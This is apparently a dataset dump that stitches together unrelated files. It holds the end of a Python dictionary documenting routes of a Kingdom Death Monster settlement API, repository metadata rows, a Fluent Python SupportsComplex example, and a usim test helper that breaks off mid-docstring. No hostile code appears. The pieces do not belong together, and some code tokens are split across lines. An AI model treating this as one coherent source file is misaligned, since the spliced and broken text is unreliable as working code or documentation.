the <code>sheet</code> element, etc.</p>
""",
},
"new_survivors": {
"name": "/new/survivors",
"methods": ["POST", "OPTIONS"],
"desc": """\
<p>Not to be confused with <code>/new/survivor</code> (above),
this route adds multiple new survivors, rather than just one.</p>
<p>The JSON you have to <b>POST</b> to this route is a little different
and more limited than what you would post to <code>/new/survivor</code>.</p>
<p>The following <b>POST</b> key/value pairs are the only ones supported
by this route:</p>
<table class="embedded_table">
<tr><th>key</th><th>O/R</th><th>value type</th><th>comment</th>
<tr>
<td>settlement_id</td>
<td><b>R</b></td>
<td>settlement OID</td>
<td class="text">The OID of the settlement to which the new survivors belong.</td>
</tr>
<tr>
<td>public</td>
<td>O</td>
<td>boolean</td>
<td class="text">
The value of the new survivors'<code>public</code> attribute.
Defaults to <code>true</code>.
</td>
</tr>
<tr>
<td>male</td>
<td>O</td>
<td>arbitrary int</td>
<td class="text">The number of male survivors to create.</td>
</tr>
<tr>
<td>female</td>
<td>O</td>
<td>arbitrary int</td>
<td class="text">The number of female survivors to create.</td>
</tr>
<tr>
<td>father</td>
<td>O</td>
<td>survivor OID</td>
<td class="text">The OID of the survivor that should be the father of the new survivors.</td>
</tr>
<tr>
<td>mother</td>
<td>O</td>
<td>survivor OID</td>
<td class="text">The OID of the survivor that should be the mother of the new survivors.</td>
</tr>
</table>
<p>Creating new survivors this way is very simple. This JSON, for
example, would create two new male survivors:</p>
<code>{"male": 2, "settlement_id": "5a1485164af5ca67035bea03"}</code>
<p>A successful <b>POST</b> to this route always returns a list of
serialized survivors (i.e. the ones that were created), so if
you are creating more than four or five survivors, this route is
a.) going to take a couple/few seconds to come back to you and b.)
is going to drop a pile of JSON on your head. YHBW.</p>
<p>NB: this route <i>does not</i> support random sex assignment.</p>
""",
},
}
settlement_management = {
"settlement_get_settlement_id": {
"name": "/settlement/get/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p> Retrieve a serialized version of the settlement associated
with <settlement_id> (to include all related user and game
assets, including survivors).</p>
<p><b>Important!</b> Depending on the number of expansions, survivors,
users, etc. involved in a settlement/campaign, this one can take a
long time to come back (over 2.5 seconds on Production hardware).
YHBW</p>
""",
},
"settlement_get_summary_settlement_id": {
"name": "/settlement/get_summary/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>Get a nice, dashboard-friendly summary of a settlement's info.</p>
<p>This route is optimized for speedy returns, e.g. the kind you want when
showing a user a list of their settlements.</p>
""",
},
"settlement_get_campaign_settlement_id": {
"name": "/settlement/get_campaign/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>Retrieve a serialized version of the settlement where the
<code>user_assets</code> element includes the <code>groups</code>
list, among other things, and is intended to be used in creating
'campaign' type views.</p>
<p>Much like the big <code>get</code> route for settlements, this one
can take a while to come back, e.g. two or more seconds for a normal
settlement. YHBW.</p>
""",
},
"settlement_get_sheet_settlement_id": {
"name": "/settlement/get_sheet/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>A convenience endpoint that only returns the settlement's <code>sheet</code>
element, i.e. the dictionary of assets it owns.</p>
""",
},
"settlement_get_game_assets_settlement_id": {
"name": "/settlement/get_game_assets/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>A convenience endpoint that only returns the serialized settlement's <code>
game_assets</code> element, i.e. the JSON representation of the game assets
(gear, events, locations, etc.) required to represent the settlement. </p>
""",
},
"settlement_get_event_log_settlement_id": {
"name": "/settlement/get_event_log/<settlement_id>",
"subsection": "settlement_component_gets",
"desc": """\
<p><b>GET</b> this end point to retrieve all settlement event log
entries (in a giant hunk of JSON) in <u>reverse chronological
order</u>, i.e. latest first, oldest last.</p>
<p>PROTIP: For higher LY settlements this can be a really huge
list and take a long time to return: if you're a front-end
developer, definitely consider loading this one AFTER you have
rendered the rest of your view.</p>
<p>Another way to optimize here is to include a filter key/value
pair in your <b>POST</b> body to limit your results. Some of the
accepted filter params will decrease the time it takes for your
requested lines to come back from the API:
<table class="embedded_table">
<tr><th>key</th><th>value type</th><th>scope</th>
<tr>
<td>lines</td>
<td>arbitrary int</td>
<td class="text">Limit the return to the last <code>lines</code>-worth of lines: <code>{lines: 1
0}</code>. Note that this <u>does not</u> make the query or the return time better or faster for settlements with large event logs.</td>
</tr>
<tr>
<td>ly</td>
<td>arbitrary int</td>
<td class="text">
Limit the return to event log lines created <u>during</u> an arbitrary Lantern Year, e.g. <code>{ly: 9}</code>.<br/>
Note:
<ul class="embedded">
<li>This will always return <i>something</i> and you'll get an empty list back for Lantern Years with no events.</li>
<li>This param triggers a performance-optimized query and will return faster than a general call to the endpoint with no params.</li>
</ul>
</tr>
<tr>
<td>get_lines_after</td>
<td>event log OID</td>
<td class="text">Limit the return to event log lines created <u>after</u> an event log OID: <cod
e>{get_lines_after: "5a0370b54af5ca4306829050"}</code></td>
</tr>
<tr>
<td>survivor_id</td>
<td>arbitrary survivor's OID</td>
<td class="text">Limit the return to event log lines that are tagged with a survivor OID: <code>
{survivor_id: "5a0123b54af1ca42945716283"}</code></td>
</tr>
</table>
<p><b>Important!</b> Though the API will accept multiple filter
params at this endpoint, <b>POST</b>ing more than one of the
above can cause...unexpected output. YHBW.</p>
""",
},
"settlement_get_storage_settlement_id": {
"name": " /settlement/get_storage/<settlement_id>",
"methods": ['GET','OPTIONS'],
"subsection": "settlement_component_gets",
"desc": """\
<p>Hit this route to get representations of the settlement's storage.</p>
<p>What you get back is an array with two dictionaries, one for resources
and one for gear:</p>
<pre><code>[
{
"storage_type": "resources",
"total":0,
"name":"Resource",
"locations": [
{
"bgcolor":"B1FB17",
"handle":"basic_resources",
"name":"Basic Resources",
"collection": [
{
"handle":"_question_marks",
"name":"???",
"rules":[],
"consumable_keywords": ["fish","consumable","flower"],
"type_pretty": "Resources",
"keywords": ["organ","hide","bone","consumable"],
"desc":"You have no idea what monster bit this is. Can be used as a bone, organ, or hide!",
"type":"resources",
"sub_type":"basic_resources",
"quantity":0,"flippers":false
},
...
],
...
},
},
], </pre></code>
<p>This JSON is optimized for representation via AngularJS, i.e. iteration over
nested lists, etc.</p>
<p>Each dictionary in the main array has an array called <code>locations</code>,
which is a list of dictionaries where each dict represents a location within the
settlement.</p>
<p>Each location dictionary has an array called <code>collection</code> which is
a list of dictionaries where each dictionary is a piece of gear or a resource.</p>
<p>The attributes of the dictionaries within the <code>collection</code> array
include the <code>desc</code>, <code>quantity</code>, etc. of an individual
game asset (piece of gear or resource or whatever).</p>
""",
},
"settlement_abandon_settlement_id": {
"name": "/settlement/abandon/<settlement_id>",
"methods": ["POST", "OPTIONS"],
"desc": """\
<p>Hit this route with a <b>POST</b> to mark the settlement as abandoned.</p>
<p>Your <b>POST</b> does not need to contain anything (but it does need
to be a <b>POST</b> (<b>GET</b> requests will not abandon the settlement.</p>
<p>An abandoned settlement has a date/time stamp of when it was
abandoned as its <code>abandoned</code> attribute and you can use this in your
UI to separate it out from active settlements.</p>
""",
},
"settlement_remove_settlement_id": {
"name": "/settlement/remove/<settlement_id>",
"methods": ["POST", "OPTIONS"],
"desc": """\
<p><b>POST</b> (not <b>GET</b>) to this route to mark the settlement as
removed.</p>
<p>Once marked as removed, settlements are queued up by the API for removal
from the database: the next time the maintenance process runs, it will check
the timestap of the mark as removed event and purge the settlement
(and all survivors) from the database.</p>
<p><b>This cannot be undone.</b></p>
""",
},
#
# settlement SET attributes
#
"settlement_set_last_accessed_settlement_id": {
"name": "/settlement/set_last_accessed/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>This endpoint allows you to set the settlement's <code>last_accessed</code>
attribute, which is used in dashboard reporting, etc. </p>
<p><b>POST</b>ing an empty JSON payload to this will cause the settlement's
<code>last_accessed</code> value to be set to now.</p>
""",
},
"settlement_set_name_settlement_id": {
"name": "/settlement/set_name/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p><b>POST</b> some JSON whose body contains the key 'name' and whatever the
new name is going to be as that key's value to change the settlement's
name:</p>
<code>{'name': 'The Black Lantern'}</code>
<p><b>Important!</b> Submitting an empty string will cause the API to
default the settlement's name to "UNKNOWN". There are no technical
reasons (e.g. limitations) for this, but it breaks the display in most
client apps, so null/empty names are forbidden.</p>
""",
},
"settlement_set_attribute_settlement_id": {
"name": "/settlement/set_attribute/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p><b>POST</b> some basic JSON containing an 'attribute' and a 'value'
key where 'attribute' is an integer settlement attrib and 'value' is
the new value:</p>
<code>{'attribute': 'survival_limit', 'value': 3}</code>
<p> This route also supports incrementing the <code>population</code>
and <code>death_count</code> attributes. </p>
""",
},
"settlement_set_inspirational_statue_settlement_id": {
"name": "/settlement/set_inspirational_statue/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>Set the settlement's <code>inspirational_statue</code> attrib
by <b>POST</b>ing a Fighting Art handle to this route:</p>
<code>{'handle': 'leader'}</code>
<p>This route will actually check out the handle and barf on you
if you try to <b>POST</b> an unrecognized FA handle to it. YHBW.</p>
""",
},
"settlement_set_lantern_research_level_settlement_id": {
"name": "/settlement/set_lantern_research_level/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>Set the Settlement's Lantern Research Level with some basic
JSON:</p>
<code>{'value': 3}</code>
<p>This route is preferably to a generic attribute setting route
becuase it a.) ignores values over 5 and b.) forces the attrib,
which is not part of the standard data motel, to exist if it does
not.</p>
<p>Definitely use this instead of <code>set_attribute</code>.</p>
""",
},
"settlement_update_set_lost_settlements_settlement_id": {
"name": "/settlement/set_lost_settlements/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>Use this route to set a settlement's Lost Settlements total.</p>
<p><b>POST</b> some JSON containing the new value to set it to:</p>
<code>{"value": 2}</code>
<p>The above code would set the settlement's Lost Settlements total
to two; negative numbers will default to zero. </p>
""",
},
#
# settlement UPDATE attributes
#
"settlement_update_attribute_settlement_id": {
"name": "/settlement/update_attribute/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p><b>POST</b> some JSON containing an 'attribute' and a 'modifier'
key where 'attribute' is an integer settlement attrib and 'mofier' is
how much you want to increment it by:</p>
<code>{'attribute': 'death_count', 'modifier': -1}</code>
<p> This route also supports incrementing the <code>survival_limit
</code> and <code>death_count</code> routes.</p>
""",
},
"settlement_update_population_settlement_id": {
"name": "/settlement/update_population/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p><b>POST</b> some JSON containing the key 'modifier' whose value is
an integer that you want to add to the settlement's population
number.<p>
<p>This works basically identically to the <code>update_attribute</code>
route, so considering using that route instead. </p>
<p>For example, this JSON would add two to the settlement's
population number:</p>
<code>{'modifier': 2}</code>
<p><b>POST</b> negative numbers to decrease.</p>
<p><b>Important!</b> Settlement population can never go below zero,
so any 'modifier' values that would cause this simply cause the
total to become zero.</p>\
""",
},
"settlement_replace_game_assets_settlement_id": {
"name": "/settlement/replace_game_assets/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p>This route functions nearly identically to the other update-type routes in
this subsection, except for one crucial difference: it works on list-type
attributes of the settlement (whereas the others mostly work on string or
integer type attributes).</p>
<p>This route accepts a list of <code>handles</code> and a <code>type</code>
of game asset and then evalutes the settlement's current handles of that type,
removing and adding as necessary in order to bring the settlement's list in sync
with the incoming list. </p>
<p>Your POST body needs to define the attribute <code>type</code>
you're trying to update, as well as provide a list of handles
that represent the settlement's current asset list:</p>
<pre><code>{
"type": "locations",
"handles": [
"lantern_hoard","bonesmith","organ_grinder"
]
}</code></pre>
<p>Finally, a couple of tips/warnings on this route:<ul>
<li>The <code>handles</code> list/array is handled by the API as if it were a set, i.e. duplicates are silently ignored.</li>
<li>If any part of the update fails (i.e. individual add or remove operations), the whole update will fail and <u>no changes to the settlement will be saved</u>.</li>
<li>This route does not support Location or Innovation levels! (Use <code>set_location_level</code> or <code>set_innovation_level</code> for that.)</li>
</ul></p>
""",
},
"settlement_update_endeavor_tokens_settlement_id": {
"name": "/settlement/update_endeavor_tokens/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p>Use this route to change a settlement's endeavor token count.</p>
<p><b>POST</b> some JSON containing the number to modify by:</p>
<code>{"modifier": 2}</code>
<p>The above code would add two to the settlement's current total,
whereas the code below would decrement by one:</p>
<code>{"modifier": -1}</code>
""",
},
"settlement_update_toggle_strain_milestone_settlement_id": {
"name": "/settlement/toggle_strain_milestone/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p>You may <b>POST</b> some JSON containing the key <code>handle</code>
and the value of a strain milestone handle to toggle that strain
milestone on or off for the settlement:</p>
<code>{"handle": "ethereal_culture_strain"}</code>
<p>The API will fail if unknown <code>handle</code> values are <b>POST</b>ed.</p>
""",
},
#
# bulk survivor management
#
"settlement_update_survivors_settlement_id": {
"name": "/settlement/update_survivors/<settlement_id>",
"subsection": "settlement_manage_survivors",
"desc": """\
<p>Use this route to update a specific group of survivors, e.g.
Departing survivors.</p>
<p><b>POST</b> some JSON including the type of survivors to include,
the attribute to modify, and the modifier:</p>
<code>{include: 'departing', attribute: 'Insanity', modifier: 1}</code>
<p><b>Important!</b> This route currently only supports the
<code>include</code> value 'departing' and will error/fail/400 on
literally anything else.</p>\
""",
},
#
# settlement: manage expansions
#
"settlement_update_add_expansions_settlement_id": {
"name": "/settlement/add_expansions/<settlement_id>",
"subsection": "settlement_manage_expansions",
"desc": """\
<p>Add expansions to a settlement by <b>POST</b>ing a list of expansion handles.
The body of your post should be a JSON-style list:</p>
<code>{'expansions': ['beta_challenge_scenarios','dragon_king']}</code>
<p>
Note that this route not only updates the settlement sheet, but also
adds/removes timeline events, updates the settlement's available game
assets (e.g. items, locations, etc.).
</p>
""",
},
"settlement_update_rm_expansions_settlement_id": {
"name": "/settlement/rm_expansions/<settlement_id>",
"subsection": "settlement_manage_expansions",
"desc": """\
<p>Remove expansions from a settlement by <b>POST</b>ing a list of
expansion handles. The body of your post should be a JSON-style
list:</p>
<code>{'expansions': ['manhunter','gorm','spidicules']}</code>
<p>
Note that this route not only updates the settlement sheet, but also
adds/removes timeline events, updates the settlement's available game
assets (e.g. items, locations, etc.).
</p>
<p><b>Important!</b> We're all adults here, and the KDM API will
<i>not</i> stop you from removing expansion handles for expansions
that are required by your settlement's campaign. If you want to
prevent users from doing this, that's got to be part of your UI/UX
considerations.</p>
""",
},
#
# settlement: manage monsters
#
"settlement_set_current_quarry_settlement_id": {
"name": "/settlement/set_current_quarry/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p>This route sets the settlement's 'current_quarry' attribute,
which is the monster that the settlement's Departing Survivors are
currently hunting.</p><p><b>POST</b> some simple JSON containing a monster
name (do not use handles for this):</p>
<code>{'current_quarry': 'White Lion Lvl 2'}</code>
<p>...or, the monster is unique:</p>
<code>{'current_quarry': 'Watcher'}</code>
<p><b>Important!</b> You're typically going to want to pull monster
names from the settlements' <code>game_assets -> defeated_monsters</code>
list (which is a list of monster names created for the settlement
based on expansion content, etc.)</p>
""",
},
"settlement_add_defeated_monster_settlement_id": {
"name": "/settlement/add_defeated_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p><b>POST</b> a 'monster' string to this route to add it to the
settlement's list of defeated monsters:</p>
<code>{'monster': 'White Lion (First Story)}</code> or
<code>{'monster': 'Flower Knight Lvl 1'}</code>
<p><b>Important!</b> Watch the strings on this one and try to avoid
free text: if the API cannot parse the monster name and match it to
a known monster type/name, this will fail.</p>
""",
},
"settlement_rm_defeated_monster_settlement_id": {
"name": "/settlement/rm_defeated_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p><b>POST</b> a 'monster' string to this route to remove it from the
settlement's list of defeated monsters, i.e. the <code>sheet.defeated_monsters</code>
array/list: </p>
<code>{'monster': 'Manhunter Lvl 4'}</code>
<p>Attempts to remove strings that do NOT exist in the list will
not fail (i.e. they will be ignored and fail 'gracefully').</p>
""",
},
"settlement_add_monster_settlement_id": {
"name": "/settlement/add_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<P>Use this route to add quarry or nemesis type monsters to the
settlement. <b>POST</b> some JSON containing the handle of the monster to
add it:</p>
<code>{'handle': 'flower_knight'}</code>
<p>The API will determine whether the monster is a nemesis or a quarry
and add it to the appropriate list. For nemesis monsters, use the
<code>/settlement/update_nemesis_levels</code> route (below) to manage
the checked/completed levels for that nemesis.</p>
<p>Make sure to check the settlement JSON <code>game_assets.monsters</code>
and use the correct handle for the desired monster.</p>
""",
},
"settlement_rm_monster_settlement_id": {
"name": "/settlement/rm_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p><b>POST</b> some JSON containing a quarry or nemesis type monster handle
to remove it from the settlement's list:</p>
<code>{'handle': 'sunstalker'}</code>
<p>The API will determine whether the monster is a quarry or a nemesis.
When a nemesis monster is removed, its level detail is also removed.</p>
""",
},
"settlement_update_nemesis_levels_settlement_id": {
"name": "/settlement/update_nemesis_levels/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p>Use this method to update the Settlement sheet's <code>nemesis_encounters</code>
dictionary, i.e. to indicate that a nemesis encounter has occurred.</p>
<p>A typical dictionary might look like this:</p>
<code> "nemesis_encounters": {"slenderman": [], "butcher": [1,2]}</code>
<p>In this example, the settlement has (somehow) encountered a
a level 1 Butcher, but has not yet encountered a Slenderman.</p>
<p>To update the dictionary, <b>POST</b> some JSON that includes the
nemesis monster's handle and the levels that are complete.</p>
<p><b>POST</b> this JSON to reset/undo/remove Butcher encounters:<p>
<code>{"handle": "butcher", "levels": []}</code>
<p><b>POST</b> this JSON to record an encounter with a level 1 Manhunter:</p>
<code>{"handle": "manhunter", "levels": [1]}</code>
""",
},
"settlement_add_milestone_settlement_id": {
"name": "/settlement/add_milestone/<settlement_id>",
"subsection": "settlement_manage_principles",
"desc": """\
<p><b>POST</b> a milestone handle (get it from <code>game_assets</code>
to this route to add it to the settlement's list of milestones:</p>
<code>{handle: 'game_over'}</code>
<p>...or...</p>
<code>{handle: 'innovations_5'}</code>
<p>This endpoint will gracefully fail and politely ignore dupes.</p>
""",
},
"settlement_rm_milestone_settlement_id": {
"name": "/settlement/rm_milestone/<settlement_id>",
"subsection": "settlement_manage_principles",
"desc": """\
<p><b>POST</b> a milestone handle (get it from <code>game_assets</code> to this
route to remove it from the settlement's list of milestones:</p>
<code>{handle: 'pop_15'}</code>
<p>...or...</p>
<code>{handle: 'first_death'}</code>
<p>This endpoint will gracefully fail and politely ignore attempts to remove
handles that are not present.</p>
""",
},
"settlement_set_principle_settlement_id": {
"name": "/settlement/set_principle/<settlement_id>",
"subsection": "settlement_manage_principles",
"desc": """\
<p><b>POST</b> some JSON to this route to set or unset a settlement principle.
Request the handle of the <code>principle</code> and the election you want to
make:</p>
<pre><code>
{
principle: 'conviction',
election: 'romantic',
}</code></pre>
<p>This route has a couple of unusual behaviors to note:</p>
<ul>
<li>It requires both keys (i.e. you will get a 400 back if you
<b>POST</b> any JSON that does not include both).</li>
<li>It will accept a Boolean for 'election', because this is how
you 'un-set' a principle.</li>
</ul>
<p> To un-set a principle, simply post the principle handle and set the
<code>election</code> key to 'false':</p>
<code>{principle: 'new_life', election: false}</code>
<p> <b>Important!</b> Adding principles to (or removing them from) a
settlement automatically modifies all current survivors, in many
cases. If you've got survivor info up on the screen when you set a principle,
be sure to refresh any survivor info after <b>POST</b>ing JSON to this route!
</p>\
""",
},
#
# location controls
#
"settlement_add_location_settlement_id": {
"name": "/settlement/add_location/<settlement_id>",
"subsection": "settlement_manage_locations",
"desc": """\
<p> <b>POST</b> a location <code>handle</code> to this route to add
it to the settlement's Locations:</p>
<code>{'handle': 'bone_smith'}</code>
""",
},
"settlement_rm_location_settlement_id": {
"name": "/settlement/rm_location/<settlement_id>",
"subsection": "settlement_manage_locations",
"desc": """\
<p>This is basically the reverse of <code>add_location</code>
and works nearly identically. <b>POST</b> a JSON representation of a
Location handle to remove it from the settlement's list:</p>
<code>{'handle': 'barber_surgeon'}</code>
""",
},
"settlement_set_location_level_settlement_id": {
"name": "/settlement/set_location_level/<settlement_id>",
"subsection": "settlement_manage_locations",
"desc": """\
<p>For Locations that have a level (e.g. the People of the
Sun's 'Sacred Pool'), you may set the Location's level by posting
the <code>handle</code> of the location and the desired level:</p>
<code>{'handle': 'sacred_pool', 'level': 2}</code>
""",
},
#
# innovation controls
#
"settlement_get_innovation_deck_settlement_id": {
"name": "/settlement/get_innovation_deck/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p>Retrieve the settlement's current innovation deck as an array of asset names
by default.</p>
<p>Alternately, you can <b>POST</b> the parameter
<code>return_type: "dict"</code> to this endpoint to get a hash of innovations
(representing the settlement's Innovation Deck) back from this endpoint.</p>
<p>In the hash, innovation assets are sorted by their name (i.e. <i>not</i>
by their handle):<p>
<pre><code>{
"albedo": {
"handle": "albedo",
"name": "Albedo",
"consequences": [
"citrinitas"
],
"endeavors": [
"gorm_albedo"
],
"expansion": "gorm",
"type_pretty": "Innovations",
"sub_type_pretty": "Expansion",
"type": "innovations",
"sub_type": "expansion",
"innovation_type": "science"
},
"bed": {
"handle": "bed",
"name": "Bed",
"type": "innovations",
"endeavors": [
"bed_rest"
],
"type_pretty": "Innovations",
"sub_type_pretty": "Innovation",
"survival_limit": 1,
"sub_type": "innovation",
"innovation_type": "home"
},
...
"symposium": {
"handle": "symposium",
"name": "Symposium",
"consequences": [
"nightmare_training",
"storytelling"
],
"type": "innovations",
"settlement_buff": "When a survivor innovates, draw an additional 2 Innovation Cards to choose from.",
"type_pretty": "Innovations",
"sub_type_pretty": "Innovation",
"survival_limit": 1,
"sub_type": "innovation",
"innovation_type": "education"
}
}
</code></pre>
""",
},
"settlement_add_innovation_settlement_id": {
"name": "/settlement/add_innovation/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p> <b>POST</b> an Innovation <code>handle</code> to this route to add
it to the settlement's Innovations:</p>
<code>{'handle': 'hovel'}</code>
<p>...or:</p><code>{'handle': 'mastery_club'}</code>
<p><b>Important!</b> As far as the API is concerned, Principles (e.g.
'Graves', 'Survival of the Fittest', etc. <u>are not innovations</u>
and you <u>will</u> break the website if you try to add a principle
as if it were an innovation.</p>
<p>Use <code>set_principle</code> (below) instead.</p>
""",
},
"settlement_rm_innovation_settlement_id": {
"name": "/settlement/rm_innovation/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p>This is basically the reverse of <code>add_innovation</code>
and works nearly identically. <b>POST</b> a JSON representation of an
Innovation handle to remove it from the settlement's list:</p>
<code>{'handle': 'mastery_club'}</code>
""",
},
"settlement_set_innovation_level_settlement_id": {
"name": "/settlement/set_innovation_level/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p>For Innovations that have a level (e.g. the Slenderman's 'Dark
Water Research'), you may set the Innovation's level by posting
the <code>handle</code> of the innovation and the level:</p>
<code>{'handle': 'dark_water_research', 'level': 2}</code>
""",
},
#
# timeline!
#
"settlement_get_timeline_settlement_id": {
"name": "/settlement/get_timeline/<settlement_id>",
"subsection": "settlement_manage_timeline",
"methods": ['GET'],
"desc": """\
<p>Hit this endpoint to get a JSON representation of the
settlement's timeline.</p>
<p>This is read-only and optimized for performance, so you'll
get a timeline MUCH faster using this route than one of the
routes that pulls down the whole settlement.</p>
""",
},
"settlement_add_lantern_years_settlement_id": {
"name": "/settlement/add_lantern_years/<settlement_id>",
"subsection": "settlement_manage_timeline",
"desc": """\
<p><b>POST</b> a number (int) of years to add to the settlement's
Timeline:</p>
<code>{years: 5}</code>
<p><b>NB:</b> Timelines are capped at 50 LYs. If you try to add
a number of years that would take you above 50 LYs, you'll get a
400 back.</p>
""",
},
"settlement_replace_lantern_year_settlement_id": {
"name": "/settlement/replace_lantern_year/<settlement_id>",
"subsection": "settlement_manage_timeline",
"desc": """\
<p>This is the preferred route for adding or removing events
from a Lantern year. It basically requires <b>POST</b>ing an
entire Lantern Year to the API, so be sure to understand the
<a href="#timelineDataModel">timeline data model</a> before
attempting to use this one.</p>
<p>Since a Lantern year is a hash of hashes, replacing one is
as simple as <b>POST</b>ing that hash to this route. To "blank
out" or remove all events from an LY, for example, you would
simply send a <b>POST</b> body like this:</p>
<code>{ly: {year: 5}}</code>
<p>Similarly, to add events to that LY, you could <b>POST</b>
something like this:</p>
<code>{ly: {year: 5, settlement_event: [{handle: 'core_open_maw', handle: 'core_clinging_mist'}]}</code>
<p>Finally, as the name suggests, this is an overwrite/replace
type method, and it does not do any "checks" or comparisons
between the data in the API and your incoming LY.</p>
<p>The best practice here, from a design standpoint, is to pull
down the settlement's timeline (e.g. using <code>get_timeline</code>
(above), let the user modify an individual LY as necessary, and
then to <b>POST</b> their modified LY back, in its entirety, to
this endpoint.</p>
""",
},
"settlement_set_current_lantern_year_settlement_id": {
"name": "/settlement/set_current_lantern_year/<settlement_id>",
"subsection": "settlement_manage_timeline",
"desc": """\
<p>To set the settlement's current LY, <b>POST</b> an int to this
endpoint:</p>
<code>{ly: 3}</code>
""",
},
#
# settlement admins
#
"settlement_add_admin_settlement_id": {
"name": "/settlement/add_admin/<settlement_id>",
"subsection": "settlement_admin_permissions",
"methods": ["POST","OPTIONS"],
"desc": """\
<p><b>POST</b> the email address of a registered user to add them to the
list of settlement administrators:</p>
<code>{login: '[email protected]'}</code>
<p>Disclaimers:<ul><li>This will fail gracefully if the user's
email is in the list (so feel free to spam it).</li><li>This will
fail loudly if the email address does not belong to a registered
user: you'll get a 400 and a nasty message back.</li></ul>
</p>
""",
},
"settlement_rm_admin_settlement_id": {
"name": "/settlement/rm_admin/<settlement_id>",
"subsection": "settlement_admin_permissions",
"methods": ["POST","OPTIONS"],
"desc": """\
<p>This is the reverse of the <code>add_admin</code> route.</p>
<p>Basically, you <b>POST</b> some JSON to the route including the email
of the user you want to remove from the settlement admins list:</p>
<code>{login: '[email protected]'}</code>
<p>Like the <code>add_admin</code> route, this one fails gracefully
if you try to remove someone who isn't on the list, etc.</p>
""",
},
#
# settlement notes
#
"settlement_add_note_settlement_id": {
"name": "/settlement/add_note/<settlement_id>",
"subsection": "settlement_notes_management",
"methods": ["POST","OPTIONS"],
"desc": """\
<p>Since any player in a game is allowed to create settlement
notes, the JSON required by this endpoint must include a user's
OID.</p>
<p>This endpoint supports the following key/value pairs:</p>
<table class="embedded_table">
<tr><th>key</th><th><b>R</b>/O</th><th>value</th></tr>
<tr>
<td class="small_key">author_id</td>
<td class="type"><b>R</b></type>
<td class="value">The creator's OID as a string.</td>
</tr>
<tr>
<td class="small_key">note</td>
<td class="type"><b>R</b></type>
<td class="value">The note as a string. We accept HTML here, so if you want to display this back to your users as HTML, you can do that.</td>
</tr>
<tr>
<td class="small_key">author</td>
<td class="type">O</type>
<td class="value">The creator's login, e.g. <code>[email protected]</code>, as a string. Best practice is to NOT include this, unless you really know what you're doing.</td>
</tr>
<tr>
<td class="small_key">lantern_year</td>
<td class="type">O</type>
<td class="value">The Lantern Year the note was created. Defaults to the current LY if not specified.</td>
</tr>
</table>
<p>For example, to add a new note to a settlement, your <b>POST</b>
body will, at a minimum, look something like this:</p>
<code>{author_id: "5a26eb1a4af5ca786d1ed548", note: "Nobody expects the Spanish Inquisition!"}</code>
<p><b>Important!</b> This route returns the OID of the
newly-created note:</p>
<code>{"note_oid": {"$oid": "5a2812d94af5ca03ef7db6c6"}}</code>
<p>...which can then be used to remove the note, if necessary
(see <code>rm_note</code> below).</p>
""",
},
"settlement_rm_note_settlement_id": {
"name": "/settlement/rm_note/<settlement_id>",
"subsection": "settlement_notes_management",
"methods": ["POST","OPTIONS"],
"desc": """\
<p><b>POST</b> the OID of a settlement note to remove it.</p>
<code>{_id: "5a26eb894af5ca786d1ed558"}</code>
<p>As long as you get a 200 back from this one, the note has
been removed. If you get a non-200 status (literally anything other
than a 200), something went wrong. </p>
""",
},
}
| [
"[email protected]"
]
| |
77936d27233ecb6692cf71a0edc03f93a9bed8ae | 50dd2a43daa8316fc11e0c176b5872738fcc5dde | /Learning/130_Fluent_Python/fp2-utf8/bloccode/example 13-14.py | 98a7540674b5e587a7df1e47f5cf78c41d0e53e3 | []
| no_license | FrenchBear/Python | 58204d368e3e72071eef298ff00d06ff51bd7914 | b41ab4b6a59ee9e145ef2cd887a5fe306973962b | refs/heads/master | 2023-08-31T18:43:37.792427 | 2023-08-26T15:53:20 | 2023-08-26T15:53:20 | 124,466,047 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | # Example 13-14. typing.SupportsComplex protocol source code
@runtime_checkable
class SupportsComplex(Protocol):
"""An ABC with one abstract method __complex__."""
__slots__ = ()
@abstractmethod
def __complex__(self) -> complex:
pass
| [
"[email protected]"
]
| |
c3130eff5ead53a74d10c68261d2e3559dfc4623 | 91ab6e48d02822bd957e210484fceff4ce0b7d61 | /usim_pytest/test_usimpy/utility.py | 07f6c368aa6577c5ef2802885d34f46f00ad824f | [
"MIT"
]
| permissive | MaineKuehn/usim | d203c78f2f644f546b932d1da40b50f26403d053 | 28615825fbe23140bbf9efe63fb18410f9453441 | refs/heads/master | 2021-09-25T08:05:03.015523 | 2021-09-17T13:42:39 | 2021-09-17T13:42:39 | 177,617,781 | 18 | 3 | MIT | 2021-09-17T13:42:40 | 2019-03-25T15:50:34 | Python | UTF-8 | Python | false | false | 1,097 | py | from functools import wraps
from typing import Callable, Generator
from ..utility import UnfinishedTest
def via_usimpy(test_case: Callable[..., Generator]):
"""
Mark a generator function test case to be run via a ``usim.py.Environment``
.. code:: python3
@via_usimpy
def test_sleep(env):
before = env.now
yield env.timeout(20)
after = env.now
assert after - before == 20
